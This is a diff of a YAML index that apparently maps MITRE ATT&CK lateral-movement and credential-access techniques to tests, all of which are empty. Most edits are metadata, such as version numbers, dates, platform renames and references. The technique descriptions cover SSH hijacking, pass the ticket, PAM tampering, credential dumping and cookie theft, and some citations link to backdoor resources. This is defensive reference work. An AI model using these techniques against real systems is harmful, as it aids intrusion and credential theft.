-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.004:
     technique:
@@ -41823,7 +42510,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.004
     atomic_tests: []
   T1091:
@@ -41887,7 +42573,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1091
     atomic_tests: []
   T1021.008:
@@ -41958,7 +42643,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.001:
     technique:
@@ -41995,7 +42679,7 @@ lateral-movement:
         url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
         description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
           11 security incident. Retrieved February 17, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-23T23:11:24.682Z'
       name: SSH Hijacking
       description: |-
         Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
@@ -42026,8 +42710,6 @@ lateral-movement:
       - root
       x_mitre_system_requirements:
       - SSH service enabled, trust relationships configured, established connections
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1021.002:
     technique:
@@ -42110,12 +42792,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.002
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -42142,6 +42823,7 @@ lateral-movement:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42159,12 +42841,12 @@ lateral-movement:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -42190,14 +42872,13 @@ lateral-movement:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021:
     technique:
@@ -42315,7 +42996,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563:
     technique:
@@ -42369,11 +43049,10 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1021.006:
     technique:
-      modified: '2023-08-11T15:26:41.941Z'
+      modified: '2024-09-12T15:28:23.398Z'
       name: 'Remote Services: Windows Remote Management'
       description: |-
         Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42425,14 +43104,13 @@ lateral-movement:
           April 27, 2016.
         url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
       - source_name: Microsoft WinRM
-        description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
-          12, 2014.
-        url: http://msdn.microsoft.com/en-us/library/aa384426
+        description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.006
     atomic_tests: []
   T1021.003:
@@ -42518,12 +43196,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.003
     atomic_tests: []
   T1550.003:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T15:21:09.330Z'
       name: 'Use Alternate Authentication Material: Pass the Ticket'
       description: |-
         Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42543,6 +43220,7 @@ lateral-movement:
       x_mitre_contributors:
       - Vincent Le Toux
       - Ryan Becwar
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
 
@@ -42550,7 +43228,6 @@ lateral-movement:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.1'
@@ -42566,39 +43243,40 @@ lateral-movement:
       id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
       created: '2020-01-30T17:03:43.072Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1550/003
         external_id: T1550.003
-      - source_name: ADSecurity AD Kerberos Attacks
-        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
-          Kerberos Attacks. Retrieved June 2, 2016.
-        url: https://adsecurity.org/?p=556
-      - source_name: GentilKiwi Pass the Ticket
-        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
-          2, 2016.
-        url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: CERT-EU Golden Ticket Protection
+        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       - source_name: Campbell 2014
         description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
           4, 2014.
         url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+      - source_name: GentilKiwi Pass the Ticket
+        description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+          12, 2024.
+        url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+      - source_name: ADSecurity AD Kerberos Attacks
+        description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+          Kerberos Attacks. Retrieved June 2, 2016.
+        url: https://adsecurity.org/?p=556
       - source_name: Stealthbits Overpass-the-Hash
         description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
           Attacks. Retrieved February 4, 2021.
         url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
-      - source_name: CERT-EU Golden Ticket Protection
-        description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
-          April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
-        url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1550.003
     atomic_tests: []
   T1021.007:
     technique:
-      modified: '2023-04-14T22:27:04.095Z'
+      modified: '2024-10-15T15:52:47.255Z'
       name: Cloud Services
       description: "Adversaries may log into accessible cloud services within a compromised
         environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
@@ -42623,12 +43301,11 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
-      - Azure AD
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       type: attack-pattern
@@ -42642,13 +43319,12 @@ lateral-movement:
         external_id: T1021.007
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1072:
     technique:
-      modified: '2024-04-12T03:40:37.954Z'
+      modified: '2024-09-25T20:49:37.227Z'
       name: Software Deployment Tools
       description: "Adversaries may gain access to and use centralized software suites
         installed within an enterprise to execute commands and move laterally through
@@ -42665,7 +43341,7 @@ lateral-movement:
         on cloud-hosted instances, as well as the execution of arbitrary commands
         on on-premises endpoints. For example, Microsoft Configuration Manager allows
         Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
-        joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+        joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
         AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
         to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
         Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42713,7 +43389,7 @@ lateral-movement:
       - Windows
       - Network
       - SaaS
-      x_mitre_version: '3.0'
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Application Log: Application Log Content'
@@ -42746,7 +43422,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1072
     atomic_tests: []
   T1210:
@@ -42785,7 +43460,7 @@ lateral-movement:
         description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
           Detail. Retrieved April 3, 2018.
         source_name: NVD CVE-2014-7169
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-02-24T15:06:46.006Z'
       name: Exploitation of Remote Services
       description: |-
         Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42819,12 +43494,10 @@ lateral-movement:
         and goal, the system and exploitable service may need to be remotely accessible
         from the internal network.
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1534:
     technique:
-      modified: '2024-02-16T13:09:39.215Z'
+      modified: '2024-10-15T15:59:36.741Z'
       name: Internal Spearphishing
       description: |-
         After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -42852,10 +43525,9 @@ lateral-movement:
       - Windows
       - macOS
       - Linux
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Traffic Flow'
@@ -42885,7 +43557,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1570:
     technique:
@@ -42947,12 +43618,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1570
     atomic_tests: []
   T1550.004:
     technique:
-      modified: '2023-09-19T21:26:24.725Z'
+      modified: '2024-10-15T16:11:15.657Z'
       name: Web Session Cookie
       description: |-
         Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -42976,11 +43646,10 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Web Credential: Web Credential Usage'
@@ -43005,9 +43674,8 @@ lateral-movement:
         url: https://wunderwuzzi23.github.io/blog/passthecookie.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1563.002:
     technique:
@@ -43067,7 +43735,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1563.002
     atomic_tests: []
   T1550.002:
@@ -43122,7 +43789,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1550.002
     atomic_tests: []
   T1021.001:
@@ -43190,12 +43856,11 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1021.001
     atomic_tests: []
   T1550.001:
     technique:
-      modified: '2024-04-12T21:18:28.848Z'
+      modified: '2024-10-15T15:38:11.583Z'
       name: Application Access Token
       description: "Adversaries may use stolen application access tokens to bypass
         the typical authentication process and access restricted accounts, information,
@@ -43252,6 +43917,7 @@ lateral-movement:
       - Dylan Silva, AWS Security
       - Jack Burns, HubSpot
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
         granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43262,13 +43928,12 @@ lateral-movement:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Office 365
       - SaaS
-      - Google Workspace
       - Containers
       - IaaS
-      - Azure AD
-      x_mitre_version: '1.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.7'
       x_mitre_data_sources:
       - 'Web Credential: Web Credential Usage'
       x_mitre_defense_bypassed:
@@ -43327,7 +43992,6 @@ lateral-movement:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 credential-access:
   T1557:
@@ -43421,49 +44085,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1556.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Scott Knight, @sdotknight, VMware Carbon Black
-      - George Allen, VMware Carbon Black
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
-      type: attack-pattern
-      created: '2020-06-26T04:01:09.648Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1556.003
-        url: https://attack.mitre.org/techniques/T1556/003
-      - source_name: Apple PAM
-        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
-        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
-          Retrieved June 25, 2020.
-      - source_name: Man Pam_Unix
-        url: https://linux.die.net/man/8/pam_unix
-        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
-          25, 2020.
-      - source_name: Red Hat PAM
-        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
-        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
-          (PAM). Retrieved June 25, 2020.
-      - source_name: PAM Backdoor
-        url: https://github.com/zephrax/linux-pam-backdoor
-        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
-          25, 2020.
-      - source_name: PAM Creds
-        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
-        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
-          PAM backdoors & DNS requests. Retrieved June 26, 2020.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-21T16:19:55.082Z'
       name: 'Modify Authentication Process: Pluggable Authentication Modules'
       description: |-
         Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
@@ -43478,20 +44103,57 @@ credential-access:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Scott Knight, @sdotknight, VMware Carbon Black
+      - George Allen, VMware Carbon Black
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor PAM configuration and module paths (ex: <code>/etc/pam.d/</code>) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
 
         Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Logon Session: Logon Session Creation'
-      x_mitre_permissions_required:
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+      created: '2020-06-26T04:01:09.648Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/003
+        external_id: T1556.003
+      - source_name: Apple PAM
+        description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+          Retrieved June 25, 2020.
+        url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+      - source_name: Man Pam_Unix
+        description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+          25, 2020.
+        url: https://linux.die.net/man/8/pam_unix
+      - source_name: PAM Creds
+        description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+          PAM backdoors & DNS requests. Retrieved June 26, 2020.
+        url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+      - source_name: Red Hat PAM
+        description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+          (PAM). Retrieved June 25, 2020.
+        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+      - source_name: PAM Backdoor
+        description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+          25, 2020.
+        url: https://github.com/zephrax/linux-pam-backdoor
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1556.003
     atomic_tests: []
   T1056.001:
@@ -43571,12 +44233,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1110.001:
     technique:
-      modified: '2023-10-16T16:57:41.743Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Guessing'
       description: |-
         Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.
@@ -43605,6 +44266,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Mohamed Kmal
@@ -43616,18 +44278,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -43654,14 +44316,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.001
     atomic_tests: []
   T1003:
     technique:
-      modified: '2024-04-18T23:47:41.667Z'
+      modified: '2024-10-15T15:12:43.034Z'
       name: OS Credential Dumping
       description: |
         Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures.(Citation: Brining MimiKatz to Unix) Credentials can then be used to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and access restricted information.
@@ -43785,12 +44444,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003
     atomic_tests: []
   T1539:
     technique:
-      modified: '2024-04-16T12:56:56.861Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Web Session Cookie
       description: |-
         An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.
@@ -43805,10 +44463,11 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - Johann Rehberger
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for attempts to access files and repositories on
         a local system that are used to store browser session cookies. Monitor for
@@ -43816,14 +44475,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'File: File Access'
@@ -43866,14 +44525,11 @@ credential-access:
         url: https://blog.talosintelligence.com/roblox-scam-overview/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1539
     atomic_tests: []
   T1003.002:
     technique:
-      modified: '2023-07-24T18:53:10.860Z'
+      modified: '2024-10-15T16:40:52.174Z'
       name: 'OS Credential Dumping: Security Account Manager'
       description: "Adversaries may attempt to extract credential material from the
         Security Account Manager (SAM) database either through in-memory techniques
@@ -43928,14 +44584,13 @@ credential-access:
         url: https://github.com/Neohapsis/creddump7
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.002
     atomic_tests: []
   T1552.005:
     technique:
-      modified: '2023-03-21T13:56:27.910Z'
+      modified: '2024-10-15T16:24:20.219Z'
       name: 'Unsecured Credentials: Cloud Instance Metadata API'
       description: |
         Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -43986,14 +44641,13 @@ credential-access:
         url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
